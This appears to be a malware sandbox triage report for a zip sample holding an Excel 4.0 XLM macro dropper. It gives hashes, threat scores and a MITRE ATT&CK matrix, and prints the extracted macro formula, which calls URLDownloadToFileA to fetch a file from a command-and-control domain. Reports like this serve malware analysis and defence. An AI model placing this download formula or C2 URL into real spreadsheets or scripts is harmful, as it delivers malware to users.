4d06324eecb613b38d794f04d701378645a28f9e87b1056b95339323c150d93c | Triage

Sharing

General

Target

this_issue (74).zip
Size

11KB
Sample

210305-z4hdat5hzs
MD5

bb7b00cde705ee43343e0a0e05182ca3
SHA1

74350d46d4f32913e085de4e797099c6ba7ea5de
SHA256

4d06324eecb613b38d794f04d701378645a28f9e87b1056b95339323c150d93c
SHA512

77e70f0bd3157b7dd5668b3c854a5a9a91dd3c94f1ffd5fda60a01da68de6ac0bfc40c4c936b165cdcc86035f8fdecfb1f292a70e11029b6f46238cd6d6cf37c

Score

10^/10

macro xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://dzw10jpcgj03fckc.com/inda.xls

Attributes

formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://dzw10jpcgj03fckc.com/inda.xls

Targets

- Target
  
  document-630335192.xls
- Size
  
  39KB
- MD5
  
  7f32e36c3a4ab9b3c2cb70cdd7232a97
- SHA1
  
  19a8b5279606ef888421ed4482f4222a184b6313
- SHA256
  
  64d8b1c5f101aca6c0f3e6b31e12bc2acef52ae9ab490b07ed5e228ed43aefd0
- SHA512
  
  98ee0d78a0ed8ba81a5b9bce1a4745d99d9351ddc3eee6be76f5f3386cffe07bbb30a6e65a1e7cad6b5fdc47af21fd7a88fe4bbcae0e7c0667cfd3d65f63f002
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
behavioral1 behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

static1

behavioral1

behavioral2